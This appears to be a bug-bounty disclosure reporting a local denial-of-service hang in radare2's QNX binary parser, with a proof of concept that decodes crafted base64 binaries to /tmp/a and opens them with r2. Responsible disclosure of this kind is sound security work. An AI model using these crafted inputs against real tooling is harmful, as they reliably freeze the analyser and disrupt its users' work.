Denial of Service in radareorg/radare2
Valid
Reported on
Feb 23rd 2022
Description
R2 will hang for several crafted binaries.
Proof of Concept
printf "%s" "AAA4AAAAAB4=" | base64 -d > /tmp/a
# printf "%s" "z/rt/gwAAAEuAAB//wAAAACe2QEaAAAG+s8yAOH/AQAAAA==" | base64 -d > /tmp/a
# printf "%s" "zvrt/gCd7QBMYWT6AAD6/2NiQGsOAAGbuAAAADQAAID7AAAAAAEAAAEBZWUgcmR4LCByY3gBHQAAABEAAAAB/wAA7wABAAFiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiY2JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJi/3///2KdYmJidmJiZc767QIA/38BAAr/7n/WAc767QAAAgD2AB0AABAFAAAVAQAAAAHv7+/v7+/v7+/v729jYWwvc2hhcmUvcmFkYXJlMi9wZGJ4QAAAAAQAAAEBYmVxPwCQHckEAAAAANBEyQR6ABQAkETJBAAAAAAhAAAAAAIAAAAQAAIAAAAQEAAAEgAAAAEAAABlYXhAKysBAA==" | base64 -d > /tmp/a
r2 /tmp/a # This hangs forever.
Impact
This vulnerability is capable of denial of service locally.
Occurrences
bin_qnx.c L75
This line is never satisfied.
We are processing your report and will contact the
radareorg/radare2
team within 24 hours.
a year ago
lazymio modified the report
a year ago
lazymio modified the report
a year ago
@pancake Thanks!
@admin I would like to request a CVE for this disclosure. : )
bin_qnx.c#L75
has been validated
to join this conversation